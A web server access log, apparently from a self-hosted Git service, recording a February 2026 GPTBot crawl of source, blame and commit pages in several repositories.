"/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179790] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10483] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:14:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10485] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:14:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" +[17/Feb/2026:14:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34489] [Gzip 14.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" +[17/Feb/2026:14:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" [Client 74.7.227.38] [Length 10711] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" +[17/Feb/2026:14:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" +[17/Feb/2026:14:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10114] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:14:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=source" [Client 74.7.227.38] [Length 11591] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" +[17/Feb/2026:14:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" +[17/Feb/2026:14:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=source" [Client 74.7.227.38] [Length 11591] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" +[17/Feb/2026:14:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" +[17/Feb/2026:14:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11259] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21044] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21047] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11258] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 626385] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10250] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322670] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls" [Client 74.7.227.38] [Length 9933] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" +[17/Feb/2026:14:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25625] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25620] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10285] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10471] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10822] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/stars" [Client 74.7.227.38] [Length 7382] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:14:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:14:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 11843] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:14:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" +[17/Feb/2026:14:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" +[17/Feb/2026:14:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21529] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:14:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21497] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:14:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10995] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 